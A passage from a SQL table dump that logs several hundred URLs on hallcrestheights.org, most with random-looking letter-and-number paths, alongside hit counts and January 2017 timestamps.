00:00:00'),(3153,'http://www.hallcrestheights.org/ryvhr-hmqt-i20162637-yysl-lgeajanp-k484-dmefnxhq.htm',NULL,'','',1,0,'2017-01-08 16:52:15','0000-00-00 00:00:00'),(3154,'http://www.hallcrestheights.org/cwhriwg-k6273-pekzq-dwkvum-zbsaii-mjzfo-zgdv-ddqjvd-i20162631-obknly/',NULL,'','',2,0,'2017-01-08 16:53:54','0000-00-00 00:00:00'),(3155,'http://www.hallcrestheights.org/i20162636-k25280-pcscqruf-unpkw-xpoideot-wtvsoar.htm',NULL,'','',2,0,'2017-01-08 16:55:42','0000-00-00 00:00:00'),(3156,'http://www.hallcrestheights.org/i20162632-k35720-dvisciwb-vwkux-krbzomsm-vuclzup.htm',NULL,'','',1,0,'2017-01-08 16:58:25','0000-00-00 00:00:00'),(3157,'http://www.hallcrestheights.org/nfrkopd-k56673-obbum-golzes-rkwtzq-tqbsv-jcwj-i20162630-bxnmyv-sssldj/',NULL,'','',1,0,'2017-01-08 16:59:23','0000-00-00 00:00:00'),(3158,'http://www.hallcrestheights.org/i20162636-k26180-ixnmueah-whioz-hjxbnwpg-eyooayi.htm',NULL,'','',1,0,'2017-01-08 17:00:29','0000-00-00 00:00:00'),(3159,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-vtzpxb-xkcwj-k34173-ybty-i20162630-lwosdu-ieqgws/',NULL,'','',1,0,'2017-01-08 17:03:07','0000-00-00 00:00:00'),(3160,'http://www.hallcrestheights.org/kzpffms-k60553-xklrd-edhwge-i20162631-fvbbgz-agpec-iyyu-wuvfzt-jigjin-amzbcng/',NULL,'','',1,0,'2017-01-08 17:11:48','0000-00-00 00:00:00'),(3161,'http://www.hallcrestheights.org/i20162632-k57320-ryvhrhmq-tyysl-lgeajanp-dmefnxh.htm',NULL,'','',1,0,'2017-01-08 17:11:48','0000-00-00 00:00:00'),(3162,'http://www.hallcrestheights.org/i20162636-k46880-edzvdlqc-omnnm-mcawvbfu-japyvrl.htm',NULL,'','',2,0,'2017-01-08 17:15:00','0000-00-00 00:00:00'),(3163,'http://www.hallcrestheights.org/vqjny-k52534-spvh-oljp-eurrtpil/uourxivl-btrhnn-mtqzk-owtsxp-i20162636-pbgrr.htm',NULL,'','',1,0,'2017-01-08 17:16:16','0000-00-00 00:00:00'),(3164,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum/i20162635-zbsai-imjz-fozgdvd-dqjvdob-k38799-knlyk/',NULL,'','',1,0,'2017-01-08 17:17:29','0000-00-00 00:00:00'),(3165,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-i20162631-uhvfcy/zlsxx-qrox-aehksk-xyxemb-uqudtwq-ceyvu-ciwqw-k61103-sgfrvrjo/',NULL,'','',1,0,'2017-01-08 17:18:15','0000-00-00 00:00:00'),(3166,'http://www.hallcrestheights.org/i20162630-wbwpbon-kydhx-jjikvf-k46653-vtzpxb-xkcwj-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn/',NULL,'','',1,0,'2017-01-08 17:19:41','0000-00-00 00:00:00'),(3167,'http://www.hallcrestheights.org/nfrk-opdobbu-mgolzes-rkwtz-qtqbs-k28905-vjcwjbx-nmyv-sssldjzn-aahjb-i20162629-kwxros/',NULL,'','',1,0,'2017-01-08 17:19:46','0000-00-00 00:00:00'),(3168,'http://www.hallcrestheights.org/oiyizgo-lrcmw-fbsnop-i20162631-dgfnhs/krljr-gfct-fzfiwx-wmakoa-yosmpql-gvegd-fvgcr-k8003-cbzmqnod/',NULL,'','',1,0,'2017-01-08 17:21:51','0000-00-00 00:00:00'),(3169,'http://www.hallcrestheights.org/i20162628-k18440-mrcqgbei-fuwgr-abtnwyrq-semgwko.htm',NULL,'','',1,0,'2017-01-08 17:23:08','0000-00-00 00:00:00'),(3170,'http://www.hallcrestheights.org/gnfz-nxvjxpa-k22482-ltitj/shkyjy-ldpijaa-mdurtaen-i20162630-pggwtdv-lxtdqkun.htm',NULL,'','',1,0,'2017-01-08 17:23:46','0000-00-00 00:00:00'),(3171,'http://www.hallcrestheights.org/yembjvh-k46953-tqqdc-kzfltz-terqbw-nswns-njpl-i20162630-pftrrj-ncypjo/',NULL,'','',1,0,'2017-01-08 17:24:39','0000-00-00 00:00:00'),(3172,'http://www.hallcrestheights.org/i20162628-fadl-ajfnlgf-pcvwg-myhdec-wxbdeud-kovfiibp-tquhzxc-hhrmxagf-k27092-papu-hgfqvjdc-lbbvzgrc-mdfwbyb.htm',NULL,'','',1,0,'2017-01-08 17:25:01','0000-00-00 00:00:00'),(3173,'http://www.hallcrestheights.org/wbwp-bonkydh/i20162630-xjjikvf-vtzpx-bxkcw-k17195-jybtylw/',NULL,'','',1,0,'2017-01-08 17:25:09','0000-00-00 00:00:00'),(3174,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-uhvfcy-zlsxx-k60453-qrox-aehksk-i20162631-xyxemb/',NULL,'','',1,0,'2017-01-08 17:25:16','0000-00-00 00:00:00'),(3175,'http://www.hallcrestheights.org/i20162632-k37520-edzvdlqc-omnnm-mcawvbfu-japyvrl.htm',NULL,'','',1,0,'2017-01-08 17:26:04','0000-00-00 00:00:00'),(3176,'http://www.hallcrestheights.org/i20162632-k14120-edzvdlqc-omnnm-mcawvbfu-japyvrl.htm',NULL,'','',1,0,'2017-01-08 17:28:11','0000-00-00 00:00:00'),(3177,'http://www.hallcrestheights.org/i20162630-k16495-htxw-hykrsvs/vhudykb-qxdos-fiety/',NULL,'','',2,0,'2017-01-08 17:29:26','0000-00-00 00:00:00'),(3178,'http://www.hallcrestheights.org/k49705-nfrk-opdobbu-mgolzes-rkwtz-i20162629-qtqbs/',NULL,'','',1,0,'2017-01-08 17:30:02','0000-00-00 00:00:00'),(3179,'http://www.hallcrestheights.org/k46700-upttmnbe-atgrb-i20162634-nqcdcncx-rdhcpgz.htm',NULL,'','',1,0,'2017-01-08 17:30:19','0000-00-00 00:00:00'),(3180,'http://www.hallcrestheights.org/vqjn-k22582-yspvhol-i20162630-jpeur-rtpilu/ourxivl-btrhnnmt-qzkowts-xppbgrrc-dsik.htm',NULL,'','',1,0,'2017-01-08 17:32:23','0000-00-00 00:00:00'),(3181,'http://www.hallcrestheights.org/cwhr-iwgpekz-qdwkvum-zbsai-imjzf-k37005-ozgdvdd-qjvd-obknlykc-onedw-i20162629-jmaxev/',NULL,'','',1,0,'2017-01-08 17:33:18','0000-00-00 00:00:00'),(3182,'http://www.hallcrestheights.org/upttmnbe-k16150-atgrb-nqcdcncx/i20162635-rdhcpgz-zdll-imvyx-jltfeo.htm',NULL,'','',3,0,'2017-01-08 17:34:46','0000-00-00 00:00:00'),(3183,'http://www.hallcrestheights.org/xhajvqlw-k18241-czbi-qsosqxo-i20162633-qkgqaqyd-cptznzvt/',NULL,'','',1,0,'2017-01-08 17:36:45','0000-00-00 00:00:00'),(3184,'http://www.hallcrestheights.org/ryvhrh-k44476-mqtyys-i20162637-llgeaj-anpd-mefnxh.htm',NULL,'','',2,0,'2017-01-08 17:41:14','0000-00-00 00:00:00'),(3185,'http://www.hallcrestheights.org/kzpffms-k35073-xklrd-edhwge-fvbbgz-agpec-iyyu-i20162630-wuvfzt-jigjin/',NULL,'','',1,0,'2017-01-08 17:42:09','0000-00-00 00:00:00'),(3186,'http://www.hallcrestheights.org/edzvdl-k62116-qcomnn-mmcawv-bfuj-i20162634-apyvrl.htm',NULL,'','',1,0,'2017-01-08 17:42:41','0000-00-00 00:00:00'),(3187,'http://www.hallcrestheights.org/jgletk-k23776-ymdrqz-i20162637-nrvmlk-swaz-vkecqq.htm',NULL,'','',1,0,'2017-01-08 17:43:45','0000-00-00 00:00:00'),(3188,'http://www.hallcrestheights.org/bsoapa-k5049-zapstasg-mhcq-cmckf-rdtf-i20162629-kgpvbch-siwhork-lvzrt/',NULL,'','',1,0,'2017-01-08 17:44:10','0000-00-00 00:00:00'),(3189,'http://www.hallcrestheights.org/fadlaj-k43576-fnlgfp-i20162637-cvwgmy-hdec-wxbdeu.htm',NULL,'','',1,0,'2017-01-08 17:44:15','0000-00-00 00:00:00'),(3190,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-oqkgq-aqyd-i20162629-k4149-cptznzv-tjqoevp-caqwj/',NULL,'','',1,0,'2017-01-08 17:44:52','0000-00-00 00:00:00'),(3191,'http://www.hallcrestheights.org/dvisci-k22876-wbvwku-i20162637-xkrbzo-msmv-uclzup.htm',NULL,'','',1,0,'2017-01-08 17:44:53','0000-00-00 00:00:00'),(3192,'http://www.hallcrestheights.org/company/topics/award/2016/if_2016.php',NULL,'','',1,0,'2017-01-08 17:56:23','0000-00-00 00:00:00'),(3193,'http://www.hallcrestheights.org/cwhr-i20162629-iwgpekz/qdwkvum-k37655-zbsai/',NULL,'','',1,0,'2017-01-08 17:58:12','0000-00-00 00:00:00'),(3194,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-vtzpxb-xkcwj-k57573-ybty-i20162630-lwosdu-ieqgws/',NULL,'','',1,0,'2017-01-08 17:59:34','0000-00-00 00:00:00'),(3195,'http://www.hallcrestheights.org/xhaj-vqlwczb-iqsosqx-oqkgq/aqydc-k37455-ptznzvt-jqoe-vpcaqwja-luwty-i20162629-bckbsx/',NULL,'','',1,0,'2017-01-08 18:01:57','0000-00-00 00:00:00'),(3196,'http://www.hallcrestheights.org/i20162635-lugdlt-k20716-rsmxxh-ypzqjl-lzoh-njumnt.htm',NULL,'','',1,0,'2017-01-08 18:02:44','0000-00-00 00:00:00'),(3197,'http://www.hallcrestheights.org/xhajvql-wczbi-qsosqx-oqkgqa-qydcp-k35973-tznz-i20162630-vtjqoe-vpcaqw/',NULL,'','',1,0,'2017-01-08 18:04:44','0000-00-00 00:00:00'),(3198,'http://www.hallcrestheights.org/qlbo-i20162629-wciggec-eayafxr-glnik/ghhmb-bxpgesm-rcai-ztbiauwd-tvixp-mtzhzz-wzrqr-k16355-dcfpsmf/',NULL,'','',1,0,'2017-01-08 18:05:22','0000-00-00 00:00:00'),(3199,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl/lgeajanp-i20162636-dmefnxhq-fhjdyh-k43254-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-08 18:06:29','0000-00-00 00:00:00'),(3200,'http://www.hallcrestheights.org/ixnmue-i20162637-ahwhio/k54026-zhjxbn-wpge.htm',NULL,'','',1,0,'2017-01-08 18:08:29','0000-00-00 00:00:00'),(3201,'http://www.hallcrestheights.org/qlbo-wciggec-eayafxr-glnik-i20162629-ghhmb-k28705-bxpgesm-rcai/',NULL,'','',1,0,'2017-01-08 18:08:35','0000-00-00 00:00:00'),(3202,'http://www.hallcrestheights.org/ixnmue-k41416-ahwhio-zhjxbn-wpge-i20162634-yooayi.htm',NULL,'','',1,0,'2017-01-08 18:09:40','0000-00-00 00:00:00'),(3203,'http://www.hallcrestheights.org/ixnm-ueahwhi/k27142-ozhjx-i20162628-bnwpge-yooayik.htm',NULL,'','',1,0,'2017-01-08 18:09:52','0000-00-00 00:00:00'),(3204,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo/i20162635-hnjumnt-ecwf-ogywb-k15750-iwyrur-fgvf.htm',NULL,'','',2,0,'2017-01-08 18:10:35','0000-00-00 00:00:00'),(3205,'http://www.hallcrestheights.org/ajqxxuc-k54873-uzaof-ifephi-ijimjn-jbogt-sakb-i20162630-ccgyfm-dvjuxz/',NULL,'','',1,0,'2017-01-08 18:10:37','0000-00-00 00:00:00'),(3206,'http://www.hallcrestheights.org/vqjn-yspvhol-jpeur/i20162628-rtpilu-ourxivl-k47542-btrhnnmt-qzkowts.htm',NULL,'','',1,0,'2017-01-08 18:11:23','0000-00-00 00:00:00'),(3207,'http://www.hallcrestheights.org/kzpffm-k26649-sxklrded-hwge-fvbbg-zagp-i20162629-eciyyuw-uvfztji-gjina/',NULL,'','',1,0,'2017-01-08 18:14:34','0000-00-00 00:00:00'),(3208,'http://www.hallcrestheights.org/edzvd-i20162636-lqco-mnnm-mcawvbfu-k11104-japyvrlf.htm',NULL,'','',1,0,'2017-01-08 18:22:10','0000-00-00 00:00:00'),(3209,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-i20162633-vwgmyhde-k15964-cwxbdeud.htm',NULL,'','',1,0,'2017-01-08 18:22:37','0000-00-00 00:00:00'),(3210,'http://www.hallcrestheights.org/bsoapa-i20162633-k19089-zapstasg-mhcq-cmckf-rdtf-kgpvbch-siwhork-lvzrt/',NULL,'','',1,0,'2017-01-08 18:22:51','0000-00-00 00:00:00'),(3211,'http://www.hallcrestheights.org/vqjny-spvh-i20162632-oljp-eurrtpil-k59164-uourxivl.htm',NULL,'','',1,0,'2017-01-08 18:26:34','0000-00-00 00:00:00'),(3212,'http://www.hallcrestheights.org/nfrkop-k48249-dobbumgo-lzes-rkwtz-i20162628-qtqb-svjcwjb-xnmyvss-sldjz/',NULL,'','',1,0,'2017-01-08 18:27:16','0000-00-00 00:00:00'),(3213,'http://www.hallcrestheights.org/zmkue-dtzj-i20162637-ivyo-qxifgxuh-k22084-xptvuhmi.htm',NULL,'','',1,0,'2017-01-08 18:34:37','0000-00-00 00:00:00'),(3214,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-i20162633-pzqjllzo-k37564-hnjumnte.htm',NULL,'','',1,0,'2017-01-08 18:34:52','0000-00-00 00:00:00'),(3215,'http://www.hallcrestheights.org/ryvh-rhmqtyy-k38392-sllge-i20162628-ajanpd-mefnxhq.htm',NULL,'','',1,0,'2017-01-08 18:37:19','0000-00-00 00:00:00'),(3216,'http://hallcrestheights.org//7otMan.htm',NULL,'','',1,0,'2017-01-08 18:40:28','0000-00-00 00:00:00'),(3217,'http://www.hallcrestheights.org/ixnmu-eahw-i20162632-hioz-hjxbnwpg-k41884-eyooayik.htm',NULL,'','',1,0,'2017-01-08 18:42:25','0000-00-00 00:00:00'),(3218,'http://www.hallcrestheights.org/i20162632-nfrkop-k38889-dobbumgo-lzes-rkwtz-qtqb-svjcwjb-xnmyvss-sldjz/',NULL,'','',1,0,'2017-01-08 18:42:26','0000-00-00 00:00:00'),(3219,'http://www.hallcrestheights.org/i20162630-vqjn-yspvhol-k12832-jpeur-rtpilu-ourxivl.htm',NULL,'','',1,0,'2017-01-08 18:42:35','0000-00-00 00:00:00'),(3220,'http://www.hallcrestheights.org/yembjv-k10449-htqqdckz-fltz-terqb-i20162636-wnsw-nsnjplp-ftrrjnc-ypjoq/',NULL,'','',1,0,'2017-01-08 18:45:16','0000-00-00 00:00:00'),(3221,'http://www.hallcrestheights.org/lugd-ltrsmxx-k42712-hypzq-jllzoh-i20162634-njumnte.htm',NULL,'','',1,0,'2017-01-08 18:50:34','0000-00-00 00:00:00'),(3222,'http://www.hallcrestheights.org/htxw-i20162629-hykrsvs-vhudykb-qxdos/fiety-uaixnrb-dggs-aarhefsk-jydmr-ujwimj-qiaau-k27155-rihcywn/',NULL,'','',1,0,'2017-01-08 18:51:52','0000-00-00 00:00:00'),(3223,'http://www.hallcrestheights.org/cwhr-iwgpekz-qdwkvum-zbsai-imjzf-i20162629-k29205-ozgdvdd-qjvd-obknlykc/',NULL,'','',1,0,'2017-01-08 18:53:01','0000-00-00 00:00:00'),(3224,'http://www.hallcrestheights.org/dvis-ciwbvwk-k16792-uxkrb-i20162628-zomsmv-uclzuph.htm',NULL,'','',1,0,'2017-01-08 18:53:22','0000-00-00 00:00:00'),(3225,'http://www.hallcrestheights.org/oiyizgo-lrcmw-fbsnop-dgfnhs/i20162630-krljr-gfct-fzfiwx-k35823-wmakoa-yosmpql-gvegd-fvgcr/',NULL,'','',1,0,'2017-01-08 18:54:03','0000-00-00 00:00:00'),(3226,'http://www.hallcrestheights.org/mrcqg-i20162636-beif-uwgr-abtnwyrq-k31804-semgwkow.htm',NULL,'','',1,0,'2017-01-08 18:54:59','0000-00-00 00:00:00'),(3227,'http://www.hallcrestheights.org/i20162630-edzv-dlqcomn-k32632-nmmca-wvbfuj-apyvrlf.htm',NULL,'','',1,0,'2017-01-08 18:55:39','0000-00-00 00:00:00'),(3228,'http://www.hallcrestheights.org/kzpf-fmsxklr-dedhwge-fvbbg-zagpe-k19005-ciyyuwu-vfzt-jigjinam-zbcng-i20162629-tfmlyr/',NULL,'','',1,0,'2017-01-08 18:55:54','0000-00-00 00:00:00'),(3229,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-uhvfc-i20162628-yzls-k47349-xxqroxa-ehkskxy-xembu/',NULL,'','',1,0,'2017-01-08 18:56:14','0000-00-00 00:00:00'),(3230,'http://www.hallcrestheights.org/bsoa-i20162629-k16255-pazapst-asgmhcq-cmckf/rdtfk-gpvbchs-iwho-rklvzrtj-rsyoa/',NULL,'','',1,0,'2017-01-08 18:57:18','0000-00-00 00:00:00'),(3231,'http://www.hallcrestheights.org/kzpffm-i20162629-sxklrded-hwge-fvbbg/zagp-eciyyuw-uvfztji-gjina-mzbcng-tfml-yrghdfip-k15599-wgdqrkbh/',NULL,'','',1,0,'2017-01-08 18:57:28','0000-00-00 00:00:00'),(3232,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf-i20162629-vtzpx-bxkcw-jybtylw-osdu-k37605-ieqgwsog-xhgpi-sdhtni-rmjhv/',NULL,'','',1,0,'2017-01-08 18:59:25','0000-00-00 00:00:00'),(3233,'http://www.hallcrestheights.org/k57850-fadlajfn-lgfpc/vwgmyhde-cwxbdeu-i20162634-dkov.htm',NULL,'','',1,0,'2017-01-08 19:00:16','0000-00-00 00:00:00'),(3234,'http://www.hallcrestheights.org/nfrk-i20162629-opdobbu-mgolzes-rkwtz/qtqbs-vjcwjbx-nmyv-sssldjzn-aahjb-kwxros-holvg-k59195-wxkwoih/',NULL,'','',1,0,'2017-01-08 19:01:14','0000-00-00 00:00:00'),(3235,'http://www.hallcrestheights.org/ajqx-k49855-xucuzao-fifephi/ijimj-i20162629-njbog-tsakbcc-gyfm/',NULL,'','',1,0,'2017-01-08 19:04:25','0000-00-00 00:00:00'),(3236,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-vtzpx/i20162632-bxkc-wjybtyl-wosduie-qgwso-gxhgpi-sdht-nirmjhvz-k28739-yxodbxan/',NULL,'','',1,0,'2017-01-08 19:04:52','0000-00-00 00:00:00'),(3237,'http://www.hallcrestheights.org/kzpf-i20162629-fmsxklr/dedhwge-fvbbg-zagpe-k27455-ciyyuwu/',NULL,'','',1,0,'2017-01-08 19:05:06','0000-00-00 00:00:00'),(3238,'http://www.hallcrestheights.org/uptt-mnbeatg-k58192-rbnqc-i20162628-dcncxr-dhcpgzz.htm',NULL,'','',1,0,'2017-01-08 19:05:17','0000-00-00 00:00:00'),(3239,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-cmckf-i20162629-rdtfk-gpvbchs-k49405-iwho/',NULL,'','',1,0,'2017-01-08 19:06:10','0000-00-00 00:00:00'),(3240,'http://www.hallcrestheights.org/k57750-upttmnbe-atgrb-nqcdcncx-rdhcpgz/i20162634-zdll-imvyx-jltfeo-bkeb-wivsmqkr-fbmlkmst.htm',NULL,'','',1,0,'2017-01-08 19:06:27','0000-00-00 00:00:00'),(3241,'http://www.hallcrestheights.org/zmku-edtzjiv-k36592-yoqxi-i20162628-fgxuhx-ptvuhmi.htm',NULL,'','',1,0,'2017-01-08 19:07:46','0000-00-00 00:00:00'),(3242,'http://www.hallcrestheights.org/i20162632-yembjv-htqqdckz-fltz-terqb-wnsw-k59589-nsnjplp-ftrrjnc-ypjoq/',NULL,'','',1,0,'2017-01-08 19:07:47','0000-00-00 00:00:00'),(3243,'http://www.hallcrestheights.org/fadla-i20162636-jfnl-gfpc-vwgmyhde-k53404-cwxbdeud.htm',NULL,'','',1,0,'2017-01-08 19:08:13','0000-00-00 00:00:00'),(3244,'http://www.hallcrestheights.org/i20162628-mrcq-gbeifuw/k26942-grabt-nwyrqs-emgwkow-hmemxgku.htm',NULL,'','',1,0,'2017-01-08 19:08:57','0000-00-00 00:00:00'),(3245,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu-uhvfc-yzlsx-k39705-xqroxae-hksk-xyxembuq-udtwq-i20162629-ceyvuc/',NULL,'','',1,0,'2017-01-08 19:10:18','0000-00-00 00:00:00'),(3246,'http://www.hallcrestheights.org/i20162630-bsoa-pazapst-asgmhcq-cmckf/rdtfk-k17295-gpvbchs-iwho-rklvzrtj-rsyoa-ayfwgd/',NULL,'','',1,0,'2017-01-08 19:10:32','0000-00-00 00:00:00'),(3247,'http://www.hallcrestheights.org/soegsz-i20162629-xyifetvt-ndyu-uhvfc/yzls-xxqroxa-ehkskxy-xembu-qudtwq-ceyv-uciwqwsg-k36299-frvrjods/',NULL,'','',1,0,'2017-01-08 19:10:50','0000-00-00 00:00:00'),(3248,'http://www.hallcrestheights.org/mrcq-gbeifuw-k15892-grabt-i20162628-nwyrqs-emgwkow.htm',NULL,'','',1,0,'2017-01-08 19:11:26','0000-00-00 00:00:00'),(3249,'http://www.hallcrestheights.org/xhajvq-i20162633-lwczbiqs-osqx-oqkgq-aqyd-k18189-cptznzv-tjqoevp-caqwj/',NULL,'','',1,0,'2017-01-08 19:15:40','0000-00-00 00:00:00'),(3250,'http://www.hallcrestheights.org/bsoa-i20162629-k59545-pazapst-asgmhcq-cmckf-rdtfk-gpvbchs-iwho-rklvzrtj-rsyoa/',NULL,'','',1,0,'2017-01-08 19:15:44','0000-00-00 00:00:00'),(3251,'http://www.hallcrestheights.org/lugdl-trsm-i20162632-xxhy-pzqjllzo-k21184-hnjumnte.htm',NULL,'','',1,0,'2017-01-08 19:16:25','0000-00-00 00:00:00'),(3252,'http://www.hallcrestheights.org/pcscq-i20162636-rufu-npkw-xpoideot-k40984-wtvsoarm.htm',NULL,'','',1,0,'2017-01-08 19:16:54','0000-00-00 00:00:00'),(3253,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-i20162633-lgeajanp-k16864-dmefnxhq.htm',NULL,'','',1,0,'2017-01-08 19:21:46','0000-00-00 00:00:00'),(3254,'http://www.hallcrestheights.org/pcscq-rufu/i20162636-k52034-npkw-xpoideot-wtvsoarm-osmgep.htm',NULL,'','',1,0,'2017-01-08 19:22:22','0000-00-00 00:00:00'),(3255,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai-imjz-fozgdvd-dqjvdob-knlyk-conedw-i20162629-k5649-jmax/',NULL,'','',1,0,'2017-01-08 19:23:40','0000-00-00 00:00:00'),(3256,'http://www.hallcrestheights.org/vqjny-i20162636-spvh-oljp-eurrtpil-k42784-uourxivl.htm',NULL,'','',1,0,'2017-01-08 19:24:05','0000-00-00 00:00:00'),(3257,'http://www.hallcrestheights.org/uptt-mnbeatg-i20162634-k32062-rbnqc/dcncxr-dhcpgzz-dllimvyx-jltfeob.htm',NULL,'','',1,0,'2017-01-08 19:24:47','0000-00-00 00:00:00'),(3258,'http://www.hallcrestheights.org/zmkue-dtzj-i20162632-ivyo-qxifgxuh-k22084-xptvuhmi.htm',NULL,'','',1,0,'2017-01-08 19:28:57','0000-00-00 00:00:00'),(3259,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq-cmckf-rdtf-kgpvbch-siwhork-lvzrt-i20162628-jrsyoa-k47949-ayfw/',NULL,'','',1,0,'2017-01-08 19:29:13','0000-00-00 00:00:00'),(3260,'http://www.hallcrestheights.org/gnfzn-i20162636-xvjx-palt-itjshkyj-k12004-yldpijaa.htm',NULL,'','',1,0,'2017-01-08 19:29:27','0000-00-00 00:00:00'),(3261,'http://www.hallcrestheights.org/fadl-ajfnlgf-k37492-pcvwg-i20162628-myhdec-wxbdeud.htm',NULL,'','',1,0,'2017-01-08 19:32:58','0000-00-00 00:00:00'),(3262,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-i20162633-jaylr-lwfv-dyruqpk-lsdefhx-dfpdf-ufpfaj-k18789-npvz/',NULL,'','',2,0,'2017-01-08 19:35:16','0000-00-00 00:00:00'),(3263,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr-i20162633-glnik-ghhm-bbxpges-mrcaizt-biauw-dtvixp-k17889-mtzh/',NULL,'','',1,0,'2017-01-08 19:42:46','0000-00-00 00:00:00'),(3264,'http://www.hallcrestheights.org/zmku-edtzjiv-k20212-yoqxi-fgxuhx-i20162634-ptvuhmi.htm',NULL,'','',1,0,'2017-01-08 19:43:50','0000-00-00 00:00:00'),(3265,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-oqkgq-aqyd-cptznzv-tjqoevp-caqwj-i20162628-aluwty-k47049-bckb/',NULL,'','',1,0,'2017-01-08 19:43:58','0000-00-00 00:00:00'),(3266,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-i20162633-abtnwyrq-k17764-semgwkow.htm',NULL,'','',1,0,'2017-01-08 19:45:05','0000-00-00 00:00:00'),(3267,'http://www.hallcrestheights.org/zmkue-k31834-dtzj-ivyo-qxifgxuh/i20162632-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi.htm',NULL,'','',1,0,'2017-01-08 19:49:28','0000-00-00 00:00:00'),(3268,'http://www.hallcrestheights.org/i20162637-jglet-k1234-kymd-rqzn-rvmlkswa/zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv.htm',NULL,'','',1,0,'2017-01-08 19:49:36','0000-00-00 00:00:00'),(3269,'http://www.hallcrestheights.org/fadlaj-i20162635-fnlgfp/k10166-cvwgmy-hdec-wxbdeu-dkovfi.htm',NULL,'','',1,0,'2017-01-08 19:51:14','0000-00-00 00:00:00'),(3270,'http://www.hallcrestheights.org/vqjnys-k52066-pvholj-peurrt-pilu/ourxiv-lbtrhn-i20162634-nmtqz-kowtsxp-pbgrrcd.htm',NULL,'','',1,0,'2017-01-08 19:57:39','0000-00-00 00:00:00'),(3271,'http://www.hallcrestheights.org/uptt-mnbeatg-k41812-rbnqc-dcncxr-i20162634-dhcpgzz.htm',NULL,'','',1,0,'2017-01-08 19:58:02','0000-00-00 00:00:00'),(3272,'http://www.hallcrestheights.org/nfrk-i20162629-opdobbu/mgolzes-rkwtz-qtqbs-k49055-vjcwjbx/',NULL,'','',1,0,'2017-01-08 19:58:36','0000-00-00 00:00:00'),(3273,'http://www.hallcrestheights.org/ryvhrh-mqtyys-k33426-llgeaj/anpd-mefnxh-i20162637-qfhjdy-haoxr-cjhwuvd.htm',NULL,'','',1,0,'2017-01-08 19:58:54','0000-00-00 00:00:00'),(3274,'http://www.hallcrestheights.org/lugd-ltrsmxx-k59092-hypzq-i20162628-jllzoh-njumnte.htm',NULL,'','',1,0,'2017-01-08 20:00:57','0000-00-00 00:00:00'),(3275,'http://www.hallcrestheights.org/xhajvq-i20162629-k36649-lwczbiqs-osqx-oqkgq-aqyd-cptznzv-tjqoevp-caqwj-aluwty/',NULL,'','',1,0,'2017-01-08 20:01:15','0000-00-00 00:00:00'),(3276,'http://www.hallcrestheights.org/k17890-edzvdlqc-omnnm/mcawvbfu-i20162628-japyvrl-flxh.htm',NULL,'','',1,0,'2017-01-08 20:01:34','0000-00-00 00:00:00'),(3277,'http://www.hallcrestheights.org/dvisc-i20162636-iwbv-wkux-krbzomsm-k32704-vuclzuph.htm',NULL,'','',1,0,'2017-01-08 20:02:08','0000-00-00 00:00:00'),(3278,'http://www.hallcrestheights.org/bsoapa-zapstasg-i20162632-mhcq-cmckf-rdtf-kgpvbch-siwhork-lvzrt-jrsyoa-k38589-ayfw/',NULL,'','',1,0,'2017-01-08 20:02:55','0000-00-00 00:00:00'),(3279,'http://www.hallcrestheights.org/i20162630-ixnm-ueahwhi-k11932-ozhjx-bnwpge-yooayik.htm',NULL,'','',1,0,'2017-01-08 20:03:06','0000-00-00 00:00:00'),(3280,'http://www.hallcrestheights.org/i20162630-dvis-ciwbvwk-k54232-uxkrb-zomsmv-uclzuph.htm',NULL,'','',1,0,'2017-01-08 20:03:25','0000-00-00 00:00:00'),(3281,'http://www.hallcrestheights.org/k4480-pcscqruf-i20162636-unpkw-xpoideot-wtvsoar-mosm.htm',NULL,'','',1,0,'2017-01-08 20:04:37','0000-00-00 00:00:00'),(3282,'http://www.hallcrestheights.org/oiyi-zgolrcm-wfbsnop-dgfnh/skrlj-k39255-rgfctfz-fiwx-wmakoayo-smpql-i20162629-gvegdf/',NULL,'','',1,0,'2017-01-08 20:05:51','0000-00-00 00:00:00'),(3283,'http://www.hallcrestheights.org/ryvhrh-mqtyys-llgeaj-anpd/mefnxh-qfhjdy-haoxr-k51366-cjhwuvd-i20162634-svezytw-lcycws-cpuakqn.htm',NULL,'','',1,0,'2017-01-08 20:06:29','0000-00-00 00:00:00'),(3284,'http://www.hallcrestheights.org/kzpffms-i20162631-xklrd-edhwge-k7773-fvbbgz-agpec-iyyu-wuvfzt-jigjin-amzbcng-tfmly/',NULL,'','',1,0,'2017-01-08 20:07:33','0000-00-00 00:00:00'),(3285,'http://www.hallcrestheights.org/xhajvql-wczbi/i20162630-qsosqx-oqkgqa-qydcp-k56903-tznz/',NULL,'','',1,0,'2017-01-08 20:08:06','0000-00-00 00:00:00'),(3286,'http://www.hallcrestheights.org/fadl-ajfnlgf-pcvwg-myhdec-wxbdeud-kovfiibp-i20162634-tquhzxc-hhrmxagf-k10712-papu-hgfqvjdc-lbbvzgrc-mdfwbyb.htm',NULL,'','',1,0,'2017-01-08 20:08:55','0000-00-00 00:00:00'),(3287,'http://www.hallcrestheights.org/fadla-jfnl/k27014-gfpc-vwgmyhde-cwxbdeud-i20162633-kovfii.htm',NULL,'','',1,0,'2017-01-08 20:09:02','0000-00-00 